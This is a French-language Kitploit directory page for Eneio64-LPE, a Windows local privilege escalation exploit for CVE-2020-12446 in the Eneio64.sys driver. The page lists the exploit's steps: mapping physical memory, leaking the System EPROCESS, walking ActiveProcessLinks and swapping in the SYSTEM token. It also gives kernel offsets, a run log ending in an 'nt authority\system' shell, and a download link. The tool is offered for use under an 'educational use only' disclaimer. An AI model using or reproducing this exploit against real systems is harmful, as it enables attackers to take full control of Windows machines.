Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Eneio64-LPE — Un exploit pour CVE-2020-12446 Eneio64.sys. Utilise superfetch pour la traduction d'adresses. | Kitploit
Outils/GitHubGitHub/s1lkys/eneio64-lpe
Escalade de PrivilègesExploitationApprentissage et ÉducationExploitation de Binaires
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

Un exploit pour CVE-2020-12446 Eneio64.sys. Utilise superfetch pour la traduction d'adresses.

Voir le dépôt
37il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
  1. Ouvre un handle vers le pilote vulnérable
  2. Mappe la mémoire physique dans l'espace utilisateur
  3. Ouvre un handle vers le processus System
  4. Interroge la table SystemHandleInformation du processus actuel pour obtenir le handle système trouvé, révélant ainsi son adresse EPROCESS.
  5. Parcourt les liens ActiveProcessLinks de l'EPROCESS du système (flink) jusqu'à trouver le PID du processus actuel.
  6. Patche le jeton du processus actuel avec le jeton du processus System
  7. Lance un nouveau processus powershell.

Utilise la méthode superfetch pour la traduction d'adresse virtuelle en physique au lieu de fuir CR3 et de parcourir les tables de pages.

Testé sur Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

Pour usage éducatif uniquement !

Télécharger l’outil